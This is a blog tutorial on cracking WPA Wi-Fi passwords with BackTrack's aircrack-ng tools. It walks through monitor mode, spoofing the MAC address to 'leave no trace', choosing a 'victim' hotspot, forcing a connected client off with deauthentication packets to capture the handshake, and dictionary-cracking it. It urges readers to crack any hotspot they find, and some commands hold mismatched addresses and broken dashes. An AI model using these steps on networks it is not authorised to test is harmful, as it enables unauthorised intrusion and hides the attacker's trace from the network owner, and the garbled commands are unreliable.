Subscribe For Free Updates!

We'll not spam mate! We promise.

Monday 26 August 2013

How to hack Wifi | WPA Wifi Password Hacking In BackTrack

Hacking WPA Wifi Password In BackTrack
[Image: images+(3).jpg]

Hellow guys today i will show you a quick 
tuto on how to hack Wpa password using backtrack so things we need are


Requirement:

1) A PC installed with Linux Backtrack 5
   Working Wireless LAN Card Installed 
                   (Very Important Part)

You must have Huge Updated Dictionary File with password (Google It)
Goto any wifi hotspot, and crack it..;)

 Let's start

Step 1:
Type this command  to check available Wlan adapters.

Code:
airmon-ng

The output should be like below

[Image: 1_thumb.jpg?w=500&h=148]

Now there is  only one wireless interface wlan0

Step 2:
Now lets try to start the airmon service on the interface that we have just found in Step 1. Run the give command
Code:
airmon-ng start wlan0
[Image: 2_thumb.png?w=416&h=263]

Ignore the errors mentioned above in my case it did not create any trouble for me but you might want to kill the conflicting services if results are different then mine. By second step we have started the service/monitor on WLAN0 now we should have additional monitoring interface on the system. You can check if a new interface mon0 is added on your system or not by using command ifconfig else try the step 3

Step 3:

You will see another interface mon0 on your system by using command ifconfig or you can the same command we did on Step 1

[Image: 3_thumb.jpg?w=330&h=133]

OVer here we can  see the new monitoring interface mon0

Step 4:

A good hacker is always suppose to leave no trace back of his break-in.If you run the command ifconfig and notice you will find that the monitoring interface mon0 and Wireless interface Wlan0 are sharing the same MAC address. In actual mon0 is sharing the same mac address as Wlan0.

[Image: 4_thumb.png?w=420&h=174]

Now we have to put a fake mac address on the monitoring interface to leave no trace.Lets make the mon0 interface down by running the command

Code:
ifconfig mon0 down

Now  lets change the MAC address of mon0 interface by running the below command
Code:
macchanger –m 00:11:22:33:44:55 mon0
[Image: 5_thumb.jpg?w=366&h=94]

The output actually shows the old and new Fake mac address.Now since we have changed the MAC address on MON0 lets bring the interface back up again using the below command
Code:
ifconfig mon0 up

Now just to be sure lets run the same command ‘ifconfig’ that we have already used earlier above in Step 4
Code:
ifconfig

[Image: 6_thumb.jpg?w=487&h=195]

Here we can see we have sucessfully changed the MAC address for our monitoring interface mon0

Step 5:

Lets start dumping the available wireless information. run the below command

Code:
airodump-ng mon0

[Image: 7_thumb.jpg?w=503&h=208]

Here my Victim router ESSID is AndroidHotSpot. The information that I need from here is
BSSID MAC details: D0:C1: B1:5B:AC:33
CHANNEL: 6

Step 6:

By now we have identified our victim its time to further narrow down this network. We need to know how many workstation/terminal connected to this wireless. Run this command with your network information that you obtained in Step 5:

Code:
airodump-ng –c 6 –w crackwpa –bssid 02:1A:11:FE:A4:CE

[Image: 8_thumb.jpg?w=390&h=107]

Here I can see that one client having mac address highlighed in green is connected to this hotspot. To find the password either you need to be patient to wait another client connect to this hotspot but time is money lets force this client to reconnect and make the handshake auth with the server so that we can take the packets

NOte
             Keep this ssh session close and open another terminal for Step 7. Do not close the existing session
Step 7:

Lets force the already connected session to make a auth handshake again
Run the given below command in the new terminal session

Code:
aireplay-ng –0 –4 –a  MAC-ADDR-OF-ROUTER –c MAC-ADDR-OF-CLIENT mon0
[Image: 9_thumb.jpg?w=428&h=91]

Final Step:
Now finally we have all the dump saved in the working directory we just need to crack the packet capture using dictionary file. Run the below command
Code:
aircrack-ng crackwpa-01.cap –w list
** crackwpa-01.cap is the filename of the capture packet
** list if the my dictionary file name

[Image: 10_thumb.jpg?w=393&h=202]
I hope that u guys have enjoyed the tutorial and let me know if it works for you 

Socialize This Post
SOCIALIZE IT →
FOLLOW →
SHARE IT →

4 comments:

  1. ive tested this method with the correct password in the dictionary list and it skipped over it 4/5 times.........

    ReplyDelete
  2. ive tested this method with the correct password in the dictionary list and it skipped over it 4/5 times.........

    ReplyDelete
  3. With these steps it is fun hacking a WiFi but beware it is a illegal act if you are hacking others WiFi connection to access internet facility.

    Thanks
    Silvester Norman

    Change MAC Address

    ReplyDelete